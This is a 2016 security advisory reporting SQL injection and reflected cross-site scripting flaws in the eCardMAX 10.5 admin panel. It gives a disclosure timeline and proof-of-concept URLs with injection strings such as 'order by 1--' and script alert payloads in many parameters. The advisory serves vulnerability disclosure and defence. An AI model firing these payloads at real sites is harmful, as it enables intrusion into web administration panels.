eCardMAX 10.5 Cross Site Scripting / SQL Injection

`eCardMAX 10.5 SQL Injection and XSS Vulnerabilities  
  
  
[Software]  
  
- eCardMAX 10.5  
  
  
[Vendor]  
  
- eCardMAX.COM - http://www.ecardmax.com/  
  
  
[Vendor Product Description]  
  
- eCardMax is the most trusted, powerful and dynamic online ecard software solution. It enables you to create your   
own ecard website with many of the advanced features found on other major sites. Starting your own ecard website   
with eCardMax is fast and easy.  
  
  
[Advisory Timeline]  
  
- 13/06/2016 -> Vulnerability discovered;  
- 13/06/2016 -> First contact with vendor;  
- 13/06/2016 -> Vendor responds asking for details;  
- 14/06/2016 -> Vulnerability details sent to the vendor;  
- 17/06/2016 -> Vendor working on a patch;  
- 28/06/2016 -> Vendor Releases Patch  
- 01/07/2016 -> Public Security Advisory Published  
  
  
[Bug Summary]  
  
- SQL Injection  
  
- Cross Site Scripting (Reflected)  
  
  
[Impact]  
  
- High  
  
  
[Affected Version]  
  
- v10.5  
  
  
[Tested on]  
  
- Apache/2.2.26  
- PHP/5.3.28  
- MySQL/5.5.49-cll  
  
  
[Bug Description and Proof of Concept]  
  
- eCardMAX suffers from a SQL Injection vulnerability. Input passed via the 'row_number' GET parameter is not properly   
sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting   
arbitrary SQL code.  
  
- Multiple cross-site scripting vulnerabilities were also discovered. The issue is triggered when input passed via multiple parameters   
is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's   
browser session in context of an affected site.  
  
  
[Proof-of-Concept]  
  
1. SQL Injection:  
  
Parameter: row_number (GET)  
POC URL:  
http://localhost/ecardmaxdemo/admin/index.php?step=admin_show_keyword&what=&row_number=10%20order%20by%201--&search_year=2016&page=2  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
2. Cross Site Scripting (Reflected):  
  
http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display&search_field=all&keyword=%3Cscript%3Ealert(1)%3C%2Fscript%3E&cmd_button=Search+User  
Parameter(s): keyword (GET)  
  
http://localhost/ecardmaxdemo/admin/index.php?step=admin_cellphone_carrier&row_number=15&page=14%22%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E  
Parameter(s): page (GET)  
  
http://localhost/ecardmaxdemo/admin/index.php?step=admin_show_keyword&what=&row_number=10%22%3E%3Cscript%3Ealert(1)%3C/script%3E&search_year=2016&page=2  
Parameter(s): row_number (GET)  
  
http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display_inactive_account&what=&row_number=15&what2=&cmd_button=%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&list_item=%3C/script%3E%3Cscript%3Ealert(2)%3C/script%3E&search_field=%3C/script%3E%3Cscript%3Ealert(3)%3C/script%3E&keyword=&num_day=%3C/script%3E%3Cscript%3Ealert(4)%3C/script%3E&num_what=%3C/script%3E%3Cscript%3Ealert(5)%3C/script%3E&from_month=%3C/script%3E%3Cscript%3Ealert(6)%3C/script%3E&from_day=%3C/script%3E%3Cscript%3Ealert(7)%3C/script%3E&from_year=%3C/script%3E%3Cscript%3Ealert(8)%3C/script%3E&to_day=%3C/script%3E%3Cscript%3Ealert(9)%3C/script%3E&to_month=%3C/script%3E%3Cscript%3Ealert(10)%3C/script%3E&to_year=%3C/script%3E%3Cscript%3Ealert(11)%3C/script%3E&page=2%3C/script%3E%3Cscript%3Ealert(12)%3C/script%3E  
Parameter(s): cmd_button, list_item, search_field, num_day, num_what, from_month, from_day, from_year, to_day, to_month, to_year, page (GET)  
  
http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display&search_field=user_name_id&cmd_button=Search+User&keyword=833981213299707%22%3E%3Cscript%3Ealert(1)%3C/script%3E  
Parameter(s): keyword (GET)  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
All flaws described here were discovered and researched by:  
  
Bikramaditya Guha aka "PhoenixX"  
`